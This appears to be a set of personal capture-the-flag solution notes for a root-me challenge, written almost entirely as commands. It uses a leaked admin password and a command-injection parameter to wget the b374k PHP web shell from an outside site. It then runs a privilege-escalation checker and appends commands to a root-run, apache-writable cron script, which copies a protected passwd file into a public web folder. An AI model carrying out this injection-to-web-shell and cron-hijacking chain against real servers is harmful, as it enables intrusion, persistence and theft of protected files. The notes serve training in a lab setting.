## note: nanocm has exploit
http://ctf03.root-me.org/~andy/data/pagesdata.txt
user: admin
password: shannon
(see md5 hash rainbow table)

## exploit arbitrary commands
http://ctf03.root-me.org/~andy/index.php?page=arbitrary&cmd=ls
admin could create this page if not already there
<? php>system

## load php web shell
http://ctf03.root-me.org/~andy/index.php?page=arbitrary&cmd=wget --no-check-certificate  https://www.exploit-db.com/apps/7767cf8b042d43af9c7def3bf66f36cf-b374k-3.2.3.tar.gz -O data/b.tar.gz

## untar package
http://ctf03.root-me.org/~andy/index.php?page=arbitrary&cmd=tar -C data -xvzf data/b.tar.gz

## use the shell
wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz

## untar the package
tar xvzf unix-privesc-check-1.4.tar.gz

## run the script
chmod 755 unix-privesc-check
./unix-privesc-check

## review the output
## note: 
## WARNING: /var/www/html/events/scripts/cron-curl.sh is run from crontab as root. 
## The user apache can write to /var/www/html/events/scripts/cron-curl.sh
## WARNING: /var/www/html/events/scripts/cron-curl.sh is run from crontab as root. 
## The user apache can write to /var/www/html/events/scripts

## check the cron frequency
cat /etc/crontab

## note: cron-curl.sh is run every minute

## add our CTF commands to cron-curl.sh
echo cp /passwd /home/andy/public_html/data >> /var/www/html/events/scripts/cron-curl.sh
echo chmod 777 /home/andy/public_html/data/passwd >> /var/www/html/events/scripts/cron-curl.sh

## wait a minute
cat /home/andy/public_html/data/passwd





